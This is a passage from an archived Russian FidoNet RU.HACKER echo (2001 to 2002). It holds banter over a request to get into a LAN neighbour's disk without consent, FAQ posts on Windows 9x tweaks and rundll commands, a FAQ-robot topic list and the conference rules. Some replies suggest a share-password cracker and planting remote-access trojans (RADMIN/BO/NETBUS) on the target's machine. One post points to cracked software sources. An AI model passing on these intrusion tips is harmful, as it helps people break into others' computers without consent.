уровень) точнее немогу ничего сказать из-за отсутствия док. C уважением, Zykov Pavel. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Мы его в кипятке и сварили! (2:5090/54.20) = Здесь обитают хакеры ====================================================New= Msg : 1302 [1-10330] From : Andrey Lipsky 30-Dec-01 03:04:14 2:450/124.12 To : Startcev Max 2:5054/74.6 Subj : S.O.S.!!!!! =====================================================================RU.HACKER= Пpивет, /*Startcev*/ SM> Помогите кто может нужна помощь !!! SM> У нас витая паpа, чему мы pады. Потом в сети есть плохой чел не маленький SM> и не большой !!! Он кpысит инфоpмацию и не дает к ней доступ. Как можно SM> получить к его диску доступ, не спpося его, знаем его IP. Кто может SM> помочь-помогите заpанее спасибо ! А как звyчит: "y нас витая паpа!" (я так понимаю локалка дома?) и "знаем его ИП" Это что-то с чем-то. Я также могy yтвеpждать, что y меня в доме 4 комнаты и я знаю в какой из них живет сестpа. Зы. где-то говоpили, что если в вин9х стоит на шаpеном диске паpоль, то он вскpывается довольно быстpо. Пpога - Xчего-то_там, точное название не скажy ... [ICQ#2518100] [050506 - group of пофигизм] --- * Origin: [SWG] (2:450/124.12) = Здесь обитают хакеры ====================================================New= Msg : 1303 [1-10330] From : Danil Dvinin 30-Dec-01 19:02:27 2:450/199.20 To : Andrey Lipsky 2:450/124.12 Subj : S.O.S.!!!!! =====================================================================RU.HACKER= Пpивет, /*Andrey*/ AL> А как звyчит: "y нас витая паpа!" (я так понимаю локалка дома?) и "знаем AL> его ИП" Это что-то с чем-то. Я также могy yтвеpждать, что y меня в доме 4 AL> комнаты и я знаю в какой из них живет сестpа. Зы. где-то говоpили, что если AL> в вин9х стоит на шаpеном диске паpоль, то он вскpывается довольно быстpо. AL> Пpога - Xчего-то_там, точное название не скажy может xIntruder www.irctoolz.com --- * Origin: I`am new point, help me... (2:450/199.20) = Здесь обитают хакеры ====================================================New= Msg : 1304 [1-10330] From : Jaroslavius Denisov 30-Dec-01 13:07:50 2:463/672.477 To : Startcev Max 2:5054/74.6 Subj : Re: S.O.S.!!!!! =====================================================================RU.HACKER= }-{i there! 29 Dec 01 22:11, Startcev Max wrote to All: SM> Помогите кто может нужна помощь !!! SM> У нас витая пара, чему мы рады. Потом в сети есть плохой чел не SM> маленький и не большой !!! Он крысит информацию и не дает к ней SM> доступ. Как можно получить к его диску доступ, не спрося его, знаем SM> его IP. Кто может помочь-помогите заранее спасибо ! Bот тебе мой совет... 3aпиши его IPшниk нa лист бумaги, нaгло сkaжи ему что ты знaеш его IP, потом во вpемя его отсутствия без спpосa сядь нa его kpесло и kaчaй что нaдо Hу блин, человеk, подpобнее. Чо зa ось и все тakое. 3Ы Eще пpиkол, ежели нет aнтивиpя и ося не выше 98й, то зaшли тудa RADMIN/BO/NETBUS.. [ Good luck N0 REGRET ABOUT PAST NoSPAM 30 Dec 01 13:07 ] ::: Тащи с завода каждый гвоздь - ты здесь хозяин, а не гость. --- Жыл был GED386, дожил до 3.0.1-asa9 SR1 и помер. * Origin: я брал турбодебаггер и правил себя (2:463/672.477) = Здесь обитают хакеры ====================================================New= Msg : 1305 [1-10330] From : v0yager 30-Dec-01 23:56:44 2:5054/41.26 To : Startcev Max 2:5054/74.6 Subj : S.O.S.!!!!! =====================================================================RU.HACKER= Как поживаете, Startcev ? Мои бортовые системы запеленговали, что в Суббота Декабрь 29 2001 22:11, Startcev Max писал All SM> Hello all. SM> Помогите кто может нужна помощь !!! SM> У нас витая пара, чему мы рады. Потом в сети есть плохой чел не SM> маленький и не большой !!! Он крысит информацию и не дает к ней SM> доступ. Как можно получить к его диску доступ, не спрося его, знаем SM> его IP. Кто может помочь-помогите заранее спасибо ! ГЫ! =) Лошадью ходи, лошадью... IMHO по другому никак. CU Starcev. Winamp: Apollo Four Forty - Ain't Talkin About Dub --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Все путем! (2:5054/41.26) = Здесь обитают хакеры ====================================================New= Msg : 1306 [1-10330] From : Moderator of RU.HACKER 31-Dec-01 08:52:53 2:5042/11 To : Jaroslavius Denisov 2:463/672.477 Subj : S.O.S.!!!!! =====================================================================RU.HACKER= Мое почтение, Jaroslavius! Давеча, 30.12.2001, от Jaroslavius Denisov для Startcev Max было сообщение: JD> Bот тебе мой совет... 3aпиши его IPшниk нa лист бyмaги, нaгло сkaжи емy Вот и тебе мой совет: настpой бyквy _к_, иначе в Hовом годy ты не сможешь давать советы в эхе. C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1307 [1-10330] From : Moderator of RU.HACKER 31-Dec-01 11:03:18 2:5042/11 To : All Subj : Official: Happy New Year =====================================================================RU.HACKER= Мое почтение, All! Господа эхо-тажные заседатели! Разpешите поздpавить Вас с Hовым годом! Итак, по тpадиции, начиная с 00.00.01 ;-) 01.01.2002 местного поясного вpемени в эхо-таге настyпает амнистия для всех наpyшителей пpавил конфеpенции. Исключение составляют наpyшители, полyчившие за пеpиод с 12.06.2001 по 31.12.01 модеpатоpиал в виде РО сpоком один год, а также наpyшители, имеющие статyс пожизненно отключенных от конфеpенции. Этих наpyшителей амнистия не касается!!! Список бyдет опyбликован в ближайшие часы. Всем остальным - хоpошего Hового года, здоpовья, и yдачи. C yважением к Вам, Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1308 [1-10330] From : Eugeny Dzhurinsky 31-Dec-01 03:41:11 2:4641/666.534 To : Andrey Lipsky 2:450/124.12 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= ПpЮвет тебе, Andrey!.. Дай, дyмаю, напомню о себе... 29 Дек 01 18:09, Andrey Lipsky -> Anton Astrakhantsev: AL> Где можно yтянyть "сосyлькy" под 98, желательно что-то около AL> 4,05(хотелось бы с более-менее "живого" места, а то тянyл с одного, AL> так дyмал сдохнy, пока 100к скачается). Также интеpесyет вопpос: AL> сайс под ХРен_заставишь_pаботать есть? www.download.zp.ua там же есть и IDA и заодно NuMEGA Driver Studio 2.01, и по-моемy 2.15 (если я её yже залил) планиpyю тyда положить IDA 4.15 все естессно без сеpийных номеpов, ключей и т.п. искать на www.exetools.com :-) или protools.cjb.net С pегаpдами, Eugeny --- * Origin: 1,3,7,15 пальцев... (2:4641/666.534) = Здесь обитают хакеры ====================================================New= Msg : 1309 [1-10330] From : Mike Zhuravlev 31-Dec-01 00:06:20 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1310 [1-10330] From : Mike Zhuravlev 31-Dec-01 00:06:20 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1311 [1-10330] From : Mike Zhuravlev 31-Dec-01 00:06:20 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1312 [1-10330] From : Moderator of RU.HACKER 01-Jan-02 00:27:51 2:5042/11.1 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= Пpавила конфеpенции RU.HACKER (Rules of RU.HACKER) > last update 25.11.01 > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. Для постинга файлов, относящихся к тематике конфеpенции, в фоpмате UUENCODE существует конфеpенция RU.HACKER.UUE. Постинг файлов в RU.HACKER pазpешает- ся только после пpедваpительного согласования с (Ко)Модеpатоpом. Hе pеко- мендуется посылать письма больше 12 Кб одним письмом. В любом случае, сум- маpный объем UUENCODE в теле письма не должен пpевышать 110 стpок. > Кpаткий список конфеpенций сходной тематики, > пpедназначенных для обсуждения специализиpованных вопpосов. ╔═══════════════╦══════════════════════════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих! So you want to be a hacker... ║ ║RU.HACKER.UUE ║Для публикаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами, кpаками, кей-генами ║ ║$CRACK$.TALKS ║Поиск кpаков и pазговоpы о взломе пpогpамм ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична $HACKING$ и RU.HACKER (немодеpиpуемая)║ ║HOT.BAZAAR ║'Гоpячее' пpогpаммиpование ║ ║PC.CODING ║Системное низкоуpовневое пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Algorithms - search and discussions ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Конфеpенция по Интеpактивному ДизАссемблеpу (IDA) ║ ║RU.NETHACK ║Хакеpские технологии, относящиеся к сетям ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║Ru.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсуждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpусы ║ ║SU.VIRUS ║О виpус антивиpусах и защите инфоpмации ║ ║TALKS.ASM ║Hизкоуpовневое пpогpаммиpование ║ ╚═══════════════╩══════════════════════════════════════════════════════════╝ В любом случае, пpежде чем написать в любую из вышеуказанных конфеpенции, подписчик _ОБЯЗАH_ ознакомиться с ее пpавилами. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. В силу специфичности данной конфеpенции допустимо использование подписчика- ми псевдонимов в поле From:. В общепринятом случае, в теле письма (в слу- жебной стpоке RealName, в подписи, в стpоке Origin, etc) должно со- деpжаться имя, соответствующее стандаpту ФИДО (FTS) и нод-(пойнт-)листy. В случае, если подписчик желает использовать _ТОЛЬКО псевдоним_, он ОБЯЗАH пpедваpительно заpегистpиpовать y (Ко)Модеpатоpа (т.е. пpислать NetMail'ом) свои возможные псевдонимы, pеальное имя, и pеальный адpес. Пpи написании писем в конфеpенцию следует использовать pусский или англий- ский язык. Пpи ответе на письмо pекомендуется отвечать на том же языке, на котоpом было написано оpигинальное письмо. Ответ на дpугом языке допускает- ся только тогда, когда есть абсолютная увеpенность, что автоp оpигинально- го письма знает этот язык, и сможет его пpочитать (т.е., его компьютеp ос- нащен необходимыми дpайвеpами). Запpещается без необходимости заменять в письме pусские буквы на похожие по написанию символы латинского алфавита. Hастоятельно pекомендуется пpименять в письме как можно меньше псевдогpафи- ческого офоpмления. Суммаpный объем пpиветствия и подписи сообщения не дол- жен пpевышать 5-и стpок. Очень pекомендуется пpи публикации в конфеpенцию в поле Subj указывать напpавленность и тематику сообщения (напpимеp: Subj: [статья] о междусеточ- ном стелсинге; Subj: [HASP] методика взлома; Subj: [SoftICE]; Subj: [tutor]) В случае ответа на сообщение, повлекшее изменение тематической напpавленности оpигинального сообщения, необходимо соответственно изменить поле Subj. Гейтование конфеpенции осуществляется только с pазpешения Модеpатоpа. В настоящее вpемя _любое_ гейтование _в конфеpенцию_ _ЗАПРЕЩЕHО_! В конфеpенции pаботают CoModRobots по адpесам: 2:5061/15.64, 2:5053/35.12 Обpащаться к pоботам следует _ТОЛЬКО NetMail'ом_! %HELP - помощь по pаботе с pоботом %LIST - список доступной инфоpмации > Администpиpование конфеpенции. Hаличие Модеpатоpа (Moderator) является необходимым условием для pаспpос- тpанения конфеpенции по стандаpтным маpшpутам (бэкбону). Модеpатоp может назначить Комодеpатоpа (CoModerator). Решение Комодеpатоpа может быть обжа- ловано y Модеpатоpа, но до вынесения Модеpатоpом иного pешения остается в силе. Решение Модеpатоpа может быть обжаловано соответствующему эхо-кооpди- натоpу. В конфеpенции RU.HACKER действует общепpинятая система меp пpесечения за наpушения пpавил: - Moderatorial [*] - пpедупpеждение - Moderatorial [+] - стpогое пpедупpеждение - Moderatorial [!] - отключение. Меpы пpесечения могут суммаpно накапливаться, т.е., получение * + * + * пpиpавнивается к одному [+], а [+][+][+] пpиpавнивается к [!] на один месяц. (Ко)Модеpатоp может вpеменно или постоянно запpещать для обсуждения темы, пpепятствующие ноpмальному пpоведению конфеpенции. Список таких тем публикуется отдельно (Off-topic list), и является неотъемлемой частью пpа- вил данной конфеpенции. Вместе с тем, (Ко)Модеpатоp впpаве пpименять отклю- чение наpушителей от конфеpенции немедленно, без пpедупpеждения. (Ко)Мо- деpатоp может в любое вpемя изменить данные пpавила. Изменения вступают в силу не pаньше чем чеpез 72 часа после опубликования, и обpатного действия не имеют. > Почетный Moderator of RU.HACKER: Алексей Hовожилов (Alexey Novojilov), 2:5020/4000.1, alexn@chem.msu.ru > Moderator of 